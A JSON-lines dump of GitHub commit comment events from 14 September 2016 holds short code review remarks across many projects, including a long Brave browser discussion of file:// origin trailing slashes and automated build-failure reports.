{"id":"4564028217","type":"CommitCommentEvent","actor":{"login":"KostyaSha"},"repo":{"name":"jenkinsci/cloud-stats-plugin"},"payload":{"comment":{"id":19025187,"position":18,"line":43,"path":"src/main/java/org/jenkinsci/plugins/cloudstats/TrackedItem.java","commit_id":"cfb26a1b5ebaa8243451ca2862c78860b00d1a4d","created_at":"2016-09-14T19:21:31Z","updated_at":"2016-09-14T19:21:31Z","body":"I have own containerId and other things. Hopefully didn't get conflict but was very confused as i need name different methods id's. Maybe create one more interface and support both (this with Deprecated)? "}},"created_at":"2016-09-14T19:21:31Z"}
{"id":"4564028350","type":"CommitCommentEvent","actor":{"login":"Cheezily"},"repo":{"name":"Cheezily/FCC-ReactJS-Cookbook"},"payload":{"comment":{"id":19025188,"position":null,"line":null,"path":null,"commit_id":"6f472526c997dcb58ff2a0c6e0cb8f814da28c0d","created_at":"2016-09-14T19:21:33Z","updated_at":"2016-09-14T19:21:33Z","body":"change from npmcdn to unpkg for react-motion.js cdn"}},"created_at":"2016-09-14T19:21:33Z"}
{"id":"4564029257","type":"CommitCommentEvent","actor":{"login":"jd-moulton"},"repo":{"name":"MeshToolkit/MSTK"},"payload":{"comment":{"id":19025192,"position":null,"line":null,"path":null,"commit_id":"e51f6a08db829d0294f6676dce9bd70f6d2b0953","created_at":"2016-09-14T19:21:45Z","updated_at":"2016-09-14T19:21:45Z","body":"Elsewhere in the code the CMake variable is ENABLE_ExodusII.  Since CMake variables are case sensitive this change introduces an need to double enable ExodusII.  Please change this conditional to use ENABLE_ExodusII."}},"created_at":"2016-09-14T19:21:45Z"}
{"id":"4564031833","type":"CommitCommentEvent","actor":{"login":"allasm"},"repo":{"name":"phenotips/phenotips"},"payload":{"comment":{"id":19025198,"position":5,"line":195,"path":"components/specificity-meter/api/src/test/java/org/phenotips/data/internal/controller/SpecificityControllerTest.java","commit_id":"9e2a07d6b1c7256321135aff498cd7cfe4d28937","created_at":"2016-09-14T19:22:14Z","updated_at":"2016-09-14T19:22:14Z","body":"i think we need to revie this test and not simply add null as a parameter"}},"created_at":"2016-09-14T19:22:14Z"}
{"id":"4564036752","type":"CommitCommentEvent","actor":{"login":"jcmaslan"},"repo":{"name":"CamioCam/rtsp"},"payload":{"comment":{"id":19025214,"position":4,"line":28,"path":"cameras/paths.csv","commit_id":"4759aef6d93b8ed4dea05d1657707281df792346","created_at":"2016-09-14T19:23:11Z","updated_at":"2016-09-14T19:23:11Z","body":"@jhallard either don't include a stream description or make it:\r\nStream {{stream}} "}},"created_at":"2016-09-14T19:23:11Z"}
{"id":"4564038607","type":"CommitCommentEvent","actor":{"login":"JerryZendy"},"repo":{"name":"JerryZendy/Mygest"},"payload":{"comment":{"id":19025217,"position":null,"line":null,"path":null,"commit_id":"ed5c4121ee4bf195d0c541fac3e92f96261f7536","created_at":"2016-09-14T19:23:31Z","updated_at":"2016-09-14T19:23:31Z","body":"commit starts"}},"created_at":"2016-09-14T19:23:31Z"}
{"id":"4564041083","type":"CommitCommentEvent","actor":{"login":"bridiver"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":19025225,"position":5,"line":425,"path":"js/state/siteUtil.js","commit_id":"7f1354b3eff96389fac917c7020a22d06b641984","created_at":"2016-09-14T19:23:58Z","updated_at":"2016-09-14T19:23:58Z","body":"when we fully transition site settings to chrome prefs I think we should standardize based on Chrome. Maybe I'll create an electron api that allows us to call the same methods to avoid any issues"}},"created_at":"2016-09-14T19:23:58Z"}
{"id":"4564041575","type":"CommitCommentEvent","actor":{"login":"raidancampbell"},"repo":{"name":"orf/gping"},"payload":{"comment":{"id":19025226,"position":499,"line":301,"path":"gping/pinger.py","commit_id":"958dc6308b2dcd3f54c20f321dfa3f6271ec7fa3","created_at":"2016-09-14T19:24:04Z","updated_at":"2016-09-14T19:24:04Z","body":"What was the reasoning for this?  declaring `host` as an empty string causes it not to appear at the top of the graph.  By default, google's URL appears.  If you specify a custom host, the custom host does not appear.\r\n\r\nIt seems like the simple fix should be to copy the line above and change this line to:\r\n\r\n    host = options[0]"}},"created_at":"2016-09-14T19:24:04Z"}
{"id":"4564044300","type":"CommitCommentEvent","actor":{"login":"edzer"},"repo":{"name":"edzer/units"},"payload":{"comment":{"id":19025234,"position":4,"line":24,"path":"NAMESPACE","commit_id":"69bc1e7eeaac4a7fdc223b34d59035a7ad7e1346","created_at":"2016-09-14T19:24:35Z","updated_at":"2016-09-14T19:24:35Z","body":"(our comments crossed). That might work, but when it's not in \"Writing R extensions\", I'm inclined to consider that a hack. The import works too, right?"}},"created_at":"2016-09-14T19:24:35Z"}
{"id":"4564044467","type":"CommitCommentEvent","actor":{"login":"krlmlr"},"repo":{"name":"edzer/units"},"payload":{"comment":{"id":19025235,"position":4,"line":24,"path":"NAMESPACE","commit_id":"69bc1e7eeaac4a7fdc223b34d59035a7ad7e1346","created_at":"2016-09-14T19:24:37Z","updated_at":"2016-09-14T19:24:37Z","body":"Thanks. I wish this there was a simpler way to avoid the import. Implementing as.hms.units() in hms seems wrong to me, too."}},"created_at":"2016-09-14T19:24:37Z"}
{"id":"4564045081","type":"CommitCommentEvent","actor":{"login":"diracdeltas"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":19025236,"position":5,"line":425,"path":"js/state/siteUtil.js","commit_id":"7f1354b3eff96389fac917c7020a22d06b641984","created_at":"2016-09-14T19:24:44Z","updated_at":"2016-09-14T19:24:44Z","body":"actually i do think it should be `file://` because that's what window.location.origin returns for a file:// HTML document, and this method should be consistent with that"}},"created_at":"2016-09-14T19:24:44Z"}
{"id":"4564047091","type":"CommitCommentEvent","actor":{"login":"nanflasted"},"repo":{"name":"nanflasted/Tableau"},"payload":{"comment":{"id":19025245,"position":null,"line":null,"path":null,"commit_id":"fa50ca5a1dfeb1ebdfd780943235f5e44fcad0b3","created_at":"2016-09-14T19:25:09Z","updated_at":"2016-09-14T19:25:09Z","body":"These are licensed under GNU GPL."}},"created_at":"2016-09-14T19:25:09Z"}
{"id":"4564047642","type":"CommitCommentEvent","actor":{"login":"TGIshib"},"repo":{"name":"google/flatbuffers"},"payload":{"comment":{"id":19025246,"position":null,"line":null,"path":null,"commit_id":"9f16090f901c30f872422f60db21a0370dde8bbf","created_at":"2016-09-14T19:25:15Z","updated_at":"2016-09-14T19:25:15Z","body":"Sure :)"}},"created_at":"2016-09-14T19:25:15Z"}
{"id":"4564049885","type":"CommitCommentEvent","actor":{"login":"thopiekar"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19025254,"position":null,"line":null,"path":null,"commit_id":"31b0f748744b1bc957ab74ea5bdffa18a830935d","created_at":"2016-09-14T19:25:37Z","updated_at":"2016-09-14T19:25:37Z","body":"I also think we should really care about privacy. I mean our endusers are sharing their private data with us :wink: "}},"created_at":"2016-09-14T19:25:37Z"}
{"id":"4564053234","type":"CommitCommentEvent","actor":{"login":"bridiver"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":19025262,"position":5,"line":425,"path":"js/state/siteUtil.js","commit_id":"7f1354b3eff96389fac917c7020a22d06b641984","created_at":"2016-09-14T19:26:16Z","updated_at":"2016-09-14T19:26:16Z","body":"not sure why that's different, but we don't actually use it anywhere. It is `file:///` everywhere else in chrome including the origin we get in the permissions callback and I really think we should stick with that. "}},"created_at":"2016-09-14T19:26:16Z"}
{"id":"4564054506","type":"CommitCommentEvent","actor":{"login":"KostyaSha"},"repo":{"name":"jenkinsci/job-dsl-plugin"},"payload":{"comment":{"id":19025264,"position":null,"line":null,"path":null,"commit_id":"7226eb1a0d609eb16174ee9618cd93abd209706d","created_at":"2016-09-14T19:26:30Z","updated_at":"2016-09-14T19:26:30Z","body":"npm scopes! :)"}},"created_at":"2016-09-14T19:26:30Z"}
{"id":"4564055489","type":"CommitCommentEvent","actor":{"login":"diracdeltas"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":19025268,"position":5,"line":425,"path":"js/state/siteUtil.js","commit_id":"7f1354b3eff96389fac917c7020a22d06b641984","created_at":"2016-09-14T19:26:42Z","updated_at":"2016-09-14T19:26:42Z","body":"its weird that chrome's return value goes against https://tools.ietf.org/html/rfc6454#section-6, i wonder if they have a reason"}},"created_at":"2016-09-14T19:26:42Z"}
{"id":"4564057433","type":"CommitCommentEvent","actor":{"login":"bridiver"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":19025271,"position":5,"line":425,"path":"js/state/siteUtil.js","commit_id":"7f1354b3eff96389fac917c7020a22d06b641984","created_at":"2016-09-14T19:27:03Z","updated_at":"2016-09-14T19:27:03Z","body":"if we use `file://` we'll have to translate back and forth depending on where the it's coming from/to"}},"created_at":"2016-09-14T19:27:03Z"}
{"id":"4564057441","type":"CommitCommentEvent","actor":{"login":"calesce"},"repo":{"name":"gaearon/react-hot-loader"},"payload":{"comment":{"id":19025272,"position":null,"line":null,"path":null,"commit_id":"02b1e6dc2d8068fce8bbe63cd2344935d0093909","created_at":"2016-09-14T19:27:03Z","updated_at":"2016-09-14T19:27:03Z","body":"Yeah, I want to get #322 in and we can do beta 4."}},"created_at":"2016-09-14T19:27:03Z"}
{"id":"4564058157","type":"CommitCommentEvent","actor":{"login":"MarcosArevalo"},"repo":{"name":"MarcosArevalo/Macho"},"payload":{"comment":{"id":19025274,"position":null,"line":null,"path":null,"commit_id":"6189f13a154294b8f3faaf01cb7e2c9d6e354650","created_at":"2016-09-14T19:27:12Z","updated_at":"2016-09-14T19:27:12Z","body":"Que pasa?"}},"created_at":"2016-09-14T19:27:12Z"}
{"id":"4564060023","type":"CommitCommentEvent","actor":{"login":"harrij15"},"repo":{"name":"harrij15/SquareMeals"},"payload":{"comment":{"id":19025282,"position":null,"line":null,"path":null,"commit_id":"b1c92401331afb178526abd169c406b4ccd6f6d9","created_at":"2016-09-14T19:27:33Z","updated_at":"2016-09-14T19:27:33Z","body":"I would have submitted a pull request but I accidentally made these changes on master..."}},"created_at":"2016-09-14T19:27:33Z"}
{"id":"4564062919","type":"CommitCommentEvent","actor":{"login":"wolfbeast"},"repo":{"name":"MoonchildProductions/Pale-Moon"},"payload":{"comment":{"id":19025293,"position":null,"line":null,"path":null,"commit_id":"29df21f59586424c1f0afb1e4fbe017938cfcce7","created_at":"2016-09-14T19:28:05Z","updated_at":"2016-09-14T19:28:05Z","body":"Tag #522"}},"created_at":"2016-09-14T19:28:05Z"}
{"id":"4564066911","type":"CommitCommentEvent","actor":{"login":"bridiver"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":19025300,"position":5,"line":425,"path":"js/state/siteUtil.js","commit_id":"7f1354b3eff96389fac917c7020a22d06b641984","created_at":"2016-09-14T19:28:51Z","updated_at":"2016-09-14T19:28:51Z","body":"yea, the rfc doesn't appear to have a trailing slash, but chromium uses the trailing slash in http/https origins so they also use the \"trailing\" slash for file urls"}},"created_at":"2016-09-14T19:28:51Z"}
{"id":"4564067693","type":"CommitCommentEvent","actor":{"login":"cblgh"},"repo":{"name":"dequis/test"},"payload":{"comment":{"id":19025301,"position":null,"line":null,"path":null,"commit_id":"6628f67edd79051695c30d2e4700ff4be3d2cd7d","created_at":"2016-09-14T19:29:00Z","updated_at":"2016-09-14T19:29:00Z","body":"wow t his is true genius amazing"}},"created_at":"2016-09-14T19:29:00Z"}
{"id":"4564070211","type":"CommitCommentEvent","actor":{"login":"diracdeltas"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":19025304,"position":5,"line":425,"path":"js/state/siteUtil.js","commit_id":"7f1354b3eff96389fac917c7020a22d06b641984","created_at":"2016-09-14T19:29:30Z","updated_at":"2016-09-14T19:29:30Z","body":"there's a few places `window.location.origin` is used to get origin in the content scripts; i don't think translating is an issue since we already have to normalize the Chrome origin values to remove trailing slash in https://github.com/brave/browser-laptop/blob/master/app/filtering.js#L342"}},"created_at":"2016-09-14T19:29:30Z"}
{"id":"4564070518","type":"CommitCommentEvent","actor":{"login":"dequis"},"repo":{"name":"dequis/test"},"payload":{"comment":{"id":19025306,"position":null,"line":null,"path":null,"commit_id":"6628f67edd79051695c30d2e4700ff4be3d2cd7d","created_at":"2016-09-14T19:29:33Z","updated_at":"2016-09-14T19:29:33Z","body":"📦 "}},"created_at":"2016-09-14T19:29:33Z"}
{"id":"4564070664","type":"CommitCommentEvent","actor":{"login":"dstftw"},"repo":{"name":"rg3/youtube-dl"},"payload":{"comment":{"id":19025308,"position":6,"line":75,"path":"youtube_dl/extractor/adobepass.py","commit_id":"797c636bcb02d1199015b753d26430eec13c4b2b","created_at":"2016-09-14T19:29:34Z","updated_at":"2016-09-14T19:29:34Z","body":"By the way, looks like it's not called [Adobe Primetime](http://www.adobe.com/marketing-cloud/primetime-tv-platform/authentication.html)."}},"created_at":"2016-09-14T19:29:34Z"}
{"id":"4564071903","type":"CommitCommentEvent","actor":{"login":"MarcosArevalo"},"repo":{"name":"MarcosArevalo/Macho"},"payload":{"comment":{"id":19025313,"position":2,"line":2,"path":"README.md","commit_id":"6189f13a154294b8f3faaf01cb7e2c9d6e354650","created_at":"2016-09-14T19:29:47Z","updated_at":"2016-09-14T19:29:47Z","body":"???"}},"created_at":"2016-09-14T19:29:47Z"}
{"id":"4564073066","type":"CommitCommentEvent","actor":{"login":"MaximDanilov"},"repo":{"name":"MaximDanilov/GIIS"},"payload":{"comment":{"id":19025319,"position":null,"line":null,"path":null,"commit_id":"33dcac18044d1f16439bb7d872aee158251bf37c","created_at":"2016-09-14T19:29:58Z","updated_at":"2016-09-14T19:29:58Z","body":"Excellent"}},"created_at":"2016-09-14T19:29:58Z"}
{"id":"4564078151","type":"CommitCommentEvent","actor":{"login":"shabarov"},"repo":{"name":"shabarov/progitbook"},"payload":{"comment":{"id":19025330,"position":null,"line":null,"path":null,"commit_id":"9153270cafcbcbc16e3230c57a6c78801f1e847a","created_at":"2016-09-14T19:30:55Z","updated_at":"2016-09-14T19:30:55Z","body":"Initial commit"}},"created_at":"2016-09-14T19:30:55Z"}
{"id":"4564081187","type":"CommitCommentEvent","actor":{"login":"mcenkar"},"repo":{"name":"dotCMS/core"},"payload":{"comment":{"id":19025336,"position":14,"line":14,"path":"src/com/dotcms/rest/api/v1/content/BaseContentTypesViewCollection.java","commit_id":"948c44d28079e742d4ad0b55b6cd3f933ecf93a7","created_at":"2016-09-14T19:31:31Z","updated_at":"2016-09-14T19:31:31Z","body":"com.google.common.collect.Multimap"}},"created_at":"2016-09-14T19:31:31Z"}
{"id":"4564083620","type":"CommitCommentEvent","actor":{"login":"bridiver"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":19025345,"position":5,"line":425,"path":"js/state/siteUtil.js","commit_id":"7f1354b3eff96389fac917c7020a22d06b641984","created_at":"2016-09-14T19:31:57Z","updated_at":"2016-09-14T19:31:57Z","body":"the problem I see with normalizing to no trailing slash is that we will have to keep track of when it has to be translated back and when it doesn't. If we normalize with a trailing slash in our code we don't have to worry about that"}},"created_at":"2016-09-14T19:31:57Z"}
{"id":"4564084045","type":"CommitCommentEvent","actor":{"login":"diracdeltas"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":19025348,"position":5,"line":425,"path":"js/state/siteUtil.js","commit_id":"7f1354b3eff96389fac917c7020a22d06b641984","created_at":"2016-09-14T19:32:02Z","updated_at":"2016-09-14T19:32:02Z","body":"this boils down to the issue of whether this method should be consistent with `window.location.origin`/RFC6454 or with Chrome's internal return value. seems like either way it will cause confusion in the future. maybe we can add a flag indicating which one it should return so it can handle both explicitly."}},"created_at":"2016-09-14T19:32:02Z"}
{"id":"4564084343","type":"CommitCommentEvent","actor":{"login":"Simn"},"repo":{"name":"HaxeFoundation/haxe"},"payload":{"comment":{"id":19025349,"position":null,"line":null,"path":null,"commit_id":"e215eb34ff5a0b02677d4af80acb568a1fd3d539","created_at":"2016-09-14T19:32:07Z","updated_at":"2016-09-14T19:32:07Z","body":"Now I'm scared, why did it allow me to try and catch a _module_ like that..."}},"created_at":"2016-09-14T19:32:07Z"}
{"id":"4564087969","type":"CommitCommentEvent","actor":{"login":"turbedi"},"repo":{"name":"po-devs/pokemon-online"},"payload":{"comment":{"id":19025354,"position":null,"line":null,"path":null,"commit_id":"c0583d0781100b27b4b23093d20e014e0d5c5adc","created_at":"2016-09-14T19:32:46Z","updated_at":"2016-09-14T19:32:46Z","body":"return tr(\"\"); might work too and is a bit shorter (no promises)"}},"created_at":"2016-09-14T19:32:46Z"}
{"id":"4564089221","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19025356,"position":null,"line":null,"path":null,"commit_id":"caf2663e67574b5aea06ab96004dec2342748bd7","created_at":"2016-09-14T19:33:03Z","updated_at":"2016-09-14T19:33:03Z","body":"os_2.0_develop_signal_slot_bug (kbenne) - x86_64-MacOS-10.10-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-caf2663e67574b5aea06ab96004dec2342748bd7-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-caf2663e67574b5aea06ab96004dec2342748bd7-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-14T19:33:03Z"}
{"id":"4564089385","type":"CommitCommentEvent","actor":{"login":"jleclanche"},"repo":{"name":"HearthSim/HSReplay.net"},"payload":{"comment":{"id":19025358,"position":87,"line":87,"path":"hsreplaynet/features/models.py","commit_id":"881ce157350436f045e72dedf9d04021513749db","created_at":"2016-09-14T19:33:05Z","updated_at":"2016-09-14T19:33:05Z","body":"You can `return False` here since you check for staff right before."}},"created_at":"2016-09-14T19:33:05Z"}
{"id":"4564091796","type":"CommitCommentEvent","actor":{"login":"krizhanovsky"},"repo":{"name":"natsys/mariadb_10.2"},"payload":{"comment":{"id":19025371,"position":38,"line":917,"path":"sql/sql_insert.cc","commit_id":"7d0ae2e6a143858d2f6759fa2d57c08b23826371","created_at":"2016-09-14T19:33:34Z","updated_at":"2016-09-14T19:33:34Z","body":"What's the sense of the change? We shouldn't just reformat original code. The change makes the patch larger and makes porting more complex. Please avoid patch \"noise\" like this,"}},"created_at":"2016-09-14T19:33:34Z"}
{"id":"4564094260","type":"CommitCommentEvent","actor":{"login":"Limited55"},"repo":{"name":"theTwist84/Twisters-H5F-Console-Tool"},"payload":{"comment":{"id":19025378,"position":27,"line":81,"path":"Twisters-H5F-Console-Tool/Program.cs","commit_id":"e79c9c9e296628f3c5a241b685d60fc4e51624d9","created_at":"2016-09-14T19:34:04Z","updated_at":"2016-09-14T19:34:04Z","body":"Do you even test your code?"}},"created_at":"2016-09-14T19:34:04Z"}
{"id":"4564094486","type":"CommitCommentEvent","actor":{"login":"jleclanche"},"repo":{"name":"HearthSim/HSReplay.net"},"payload":{"comment":{"id":19025379,"position":44,"line":44,"path":"hsreplaynet/features/models.py","commit_id":"881ce157350436f045e72dedf9d04021513749db","created_at":"2016-09-14T19:34:08Z","updated_at":"2016-09-14T19:34:08Z","body":"Rename `DO_NOT_RENDER` to `DISABLED`, and `OFF` to `STAFF_ONLY`"}},"created_at":"2016-09-14T19:34:08Z"}
{"id":"4564096803","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19025389,"position":null,"line":null,"path":null,"commit_id":"c8eada605e94b85d6e2de4f4e2f358aa30d33e83","created_at":"2016-09-14T19:34:34Z","updated_at":"2016-09-14T19:34:34Z","body":"EMS (brianlball) - i386-Windows-7-VisualStudio-12: Tests Failed (2197 of 2470 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-c8eada605e94b85d6e2de4f4e2f358aa30d33e83-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-c8eada605e94b85d6e2de4f4e2f358aa30d33e83-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-88.95%25-red.svg)</a> \n"}},"created_at":"2016-09-14T19:34:34Z"}
{"id":"4564096990","type":"CommitCommentEvent","actor":{"login":"bridiver"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":19025390,"position":5,"line":425,"path":"js/state/siteUtil.js","commit_id":"7f1354b3eff96389fac917c7020a22d06b641984","created_at":"2016-09-14T19:34:36Z","updated_at":"2016-09-14T19:34:36Z","body":"well, apparently chromium already handles translating to RFC6454 for us on the renderer side so we don't have to worry about that part, but we do have to worry about internal chrome methods that expect a trailing slash. If all of our internal methods normalize to the trailing slash we won't have to worry about keeping track of which one to use"}},"created_at":"2016-09-14T19:34:36Z"}
{"id":"4564097113","type":"CommitCommentEvent","actor":{"login":"hugonasciutti"},"repo":{"name":"hugonasciutti/Project-1"},"payload":{"comment":{"id":19025391,"position":1,"line":1,"path":"1.txt","commit_id":"071e62c84b61e5fbb796b3dc460c31a49abd311d","created_at":"2016-09-14T19:34:38Z","updated_at":"2016-09-14T19:34:38Z","body":"good idea, start with tags"}},"created_at":"2016-09-14T19:34:38Z"}
{"id":"4564098355","type":"CommitCommentEvent","actor":{"login":"edzer"},"repo":{"name":"edzer/units"},"payload":{"comment":{"id":19025394,"position":4,"line":24,"path":"NAMESPACE","commit_id":"69bc1e7eeaac4a7fdc223b34d59035a7ad7e1346","created_at":"2016-09-14T19:34:53Z","updated_at":"2016-09-14T19:34:53Z","body":"I don't think that is the better solution: as that doesn't require importing units, so avoids the dependency. You can have units in Suggests, and do the requireNamespace() trick."}},"created_at":"2016-09-14T19:34:53Z"}
{"id":"4564104601","type":"CommitCommentEvent","actor":{"login":"jezdez"},"repo":{"name":"jazzband/django-constance"},"payload":{"comment":{"id":19025410,"position":12,"line":17,"path":"constance/__init__.py","commit_id":"94fabdf7c300d3d164d25e7db1b60c77612c943c","created_at":"2016-09-14T19:36:07Z","updated_at":"2016-09-14T19:36:07Z","body":"Hi @camilonova, many thanks for working on this. But I do have strong opinions about this:\r\n\r\nPlease don't add any more Django imports in the main package file, but into `constance.signals` instead. Having it here just compounds accidental import time errors that were already complex to mitigate with he laziness of the `config` object. Hence, I'd apprecciate it if you'd be so kind and fix this and then re-release it as 1.3.1. Opening a PR first before adding a new feature such as this would be strongly encouraged as well 🙌 "}},"created_at":"2016-09-14T19:36:07Z"}
{"id":"4564106044","type":"CommitCommentEvent","actor":{"login":"peonso"},"repo":{"name":"TwistedScorpio/OTHire"},"payload":{"comment":{"id":19025422,"position":null,"line":null,"path":null,"commit_id":"8186fd100e8c9e01a07b68f453c7b086584aee9a","created_at":"2016-09-14T19:36:24Z","updated_at":"2016-09-14T19:36:24Z","body":"@diegorodriguesvieira "}},"created_at":"2016-09-14T19:36:24Z"}
{"id":"4564107497","type":"CommitCommentEvent","actor":{"login":"ygliuvt"},"repo":{"name":"dakrone/clj-http"},"payload":{"comment":{"id":19025427,"position":null,"line":null,"path":null,"commit_id":"7ec10113776655d04234edcb3238a5a50943980a","created_at":"2016-09-14T19:36:40Z","updated_at":"2016-09-14T19:36:40Z","body":"I was burned by this change when trying to upgrade clj-http from 2.0.0 to 2.2.0. +1 for adding support for repeating parameters back."}},"created_at":"2016-09-14T19:36:40Z"}
{"id":"4564108302","type":"CommitCommentEvent","actor":{"login":"bridiver"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":19025433,"position":5,"line":425,"path":"js/state/siteUtil.js","commit_id":"7f1354b3eff96389fac917c7020a22d06b641984","created_at":"2016-09-14T19:36:49Z","updated_at":"2016-09-14T19:36:49Z","body":"looking through the code for `GURL` right now"}},"created_at":"2016-09-14T19:36:49Z"}
{"id":"4564108504","type":"CommitCommentEvent","actor":{"login":"JonAtOlo"},"repo":{"name":"ggordan/react-infinite-grid"},"payload":{"comment":{"id":19025435,"position":null,"line":null,"path":null,"commit_id":"330013e4c0d89ea18836f8ee272de923a59199ce","created_at":"2016-09-14T19:36:52Z","updated_at":"2016-09-14T19:36:52Z","body":"I think you mean to round the pixel value at the end, otherwise you'll end up with a missing row when Math.floor rounds down. I'd suggest this instead:\r\n\r\n'Math.floor((this.props.entries.length / this.state.itemDimensions.itemsPerRow) * this.state.itemDimensions.height);'"}},"created_at":"2016-09-14T19:36:52Z"}
{"id":"4564109467","type":"CommitCommentEvent","actor":{"login":"jezdez"},"repo":{"name":"jazzband/django-constance"},"payload":{"comment":{"id":19025437,"position":null,"line":null,"path":null,"commit_id":"90bf97c0a938b922a147e0d187caa8ce7dd5a5f2","created_at":"2016-09-14T19:37:03Z","updated_at":"2016-09-14T19:37:03Z","body":"Uh, that's not improving but just another flavor. For the record, this isn't the type of change I'd like to see without a flake8 test failing first."}},"created_at":"2016-09-14T19:37:03Z"}
{"id":"4564112401","type":"CommitCommentEvent","actor":{"login":"jashkenas"},"repo":{"name":"jashkenas/coffeescript"},"payload":{"comment":{"id":19025450,"position":null,"line":null,"path":null,"commit_id":"0e0e8f87e18358366905d5a7528e317c279b81b0","created_at":"2016-09-14T19:37:37Z","updated_at":"2016-09-14T19:37:37Z","body":"Nice one."}},"created_at":"2016-09-14T19:37:37Z"}
{"id":"4564119128","type":"CommitCommentEvent","actor":{"login":"jirutka"},"repo":{"name":"cvut/MI-PYT"},"payload":{"comment":{"id":19025466,"position":32,"line":205,"path":"tutorials/02_flask.md","commit_id":"e10d6028b99c16fa03f519f1272d267545b5c16c","created_at":"2016-09-14T19:38:57Z","updated_at":"2016-09-14T19:38:57Z","body":"typo: které ~~by~~ mají"}},"created_at":"2016-09-14T19:38:57Z"}
{"id":"4564123372","type":"CommitCommentEvent","actor":{"login":"altendky"},"repo":{"name":"altendky/st"},"payload":{"comment":{"id":19025478,"position":null,"line":null,"path":null,"commit_id":"27a48439273ccfbfafd572e477c92ad55df8606f","created_at":"2016-09-14T19:39:46Z","updated_at":"2016-09-14T19:39:46Z","body":"https://gist.github.com/altendky/490c7f7d14377e50fa7bb266612de24d"}},"created_at":"2016-09-14T19:39:46Z"}
{"id":"4564123690","type":"CommitCommentEvent","actor":{"login":"nitzmahone"},"repo":{"name":"ansible/ansible-modules-core"},"payload":{"comment":{"id":19025480,"position":64,"line":127,"path":"windows/setup.ps1","commit_id":"3c6f2c2db12be1d09420be6055b9bdece9cd15b3","created_at":"2016-09-14T19:39:50Z","updated_at":"2016-09-14T19:39:50Z","body":"Hey @dagwieers- this fact is causing trouble in CI. It looks like you were trying to just grab the RID from the end of the SID, but SIDs aren't always the same length (sometimes they're shorter than 42 chars, which makes this blow up). What's the purpose of this particular fact? I can't think of a scenario where a RID is useful on its own without the corresponding authority info. We could do a regex to find the last element of the SID working backward through the string, but unless you've got a use for this that I'm not aware of, I'm inclined to just nuke the fact before 2.2 ships... Thoughts?"}},"created_at":"2016-09-14T19:39:50Z"}
{"id":"4564123875","type":"CommitCommentEvent","actor":{"login":"diracdeltas"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":19025483,"position":5,"line":425,"path":"js/state/siteUtil.js","commit_id":"7f1354b3eff96389fac917c7020a22d06b641984","created_at":"2016-09-14T19:39:53Z","updated_at":"2016-09-14T19:39:53Z","body":"we would still have to worry about the trailing slash for `siteSettings` since those are keyed by origin sans trailing slash."}},"created_at":"2016-09-14T19:39:53Z"}
{"id":"4564127942","type":"CommitCommentEvent","actor":{"login":"thebigsmileXD"},"repo":{"name":"ClearSkyTeam/ClearSky"},"payload":{"comment":{"id":19025497,"position":null,"line":null,"path":null,"commit_id":"a62e551bd7891a09b917d9044ebd2561bfefbd84","created_at":"2016-09-14T19:40:43Z","updated_at":"2016-09-14T19:40:43Z","body":"WHAT THE FUCK?!"}},"created_at":"2016-09-14T19:40:43Z"}
{"id":"4564129338","type":"CommitCommentEvent","actor":{"login":"bridiver"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":19025505,"position":5,"line":425,"path":"js/state/siteUtil.js","commit_id":"7f1354b3eff96389fac917c7020a22d06b641984","created_at":"2016-09-14T19:41:00Z","updated_at":"2016-09-14T19:41:00Z","body":"that will go away when we transition them over to contentSettings, so it's a temporary issue"}},"created_at":"2016-09-14T19:41:00Z"}
{"id":"4564131441","type":"CommitCommentEvent","actor":{"login":"Wexcode"},"repo":{"name":"akoh17/react-starter"},"payload":{"comment":{"id":19025513,"position":207,"line":58,"path":"ui/app.jsx","commit_id":"3f2f3cd2d7d7e2874f470588fb0e41d4fc4b22f1","created_at":"2016-09-14T19:41:25Z","updated_at":"2016-09-14T19:41:25Z","body":"I think the convention would be to have your redux store hold onto the search query. Alternatively, you could use `setState` although you're right in that components are typically meant to be stateless."}},"created_at":"2016-09-14T19:41:25Z"}
{"id":"4564132001","type":"CommitCommentEvent","actor":{"login":"krizhanovsky"},"repo":{"name":"natsys/mariadb_10.2"},"payload":{"comment":{"id":19025515,"position":22,"line":1854,"path":"sql/sql_insert.cc","commit_id":"5979a00a094ee64f71dd41372be3012e32958fa2","created_at":"2016-09-14T19:41:32Z","updated_at":"2016-09-14T19:41:32Z","body":"Almost whole the change is cosmetic of original code, i.e. this is patch noise. Please rollback the changes."}},"created_at":"2016-09-14T19:41:32Z"}
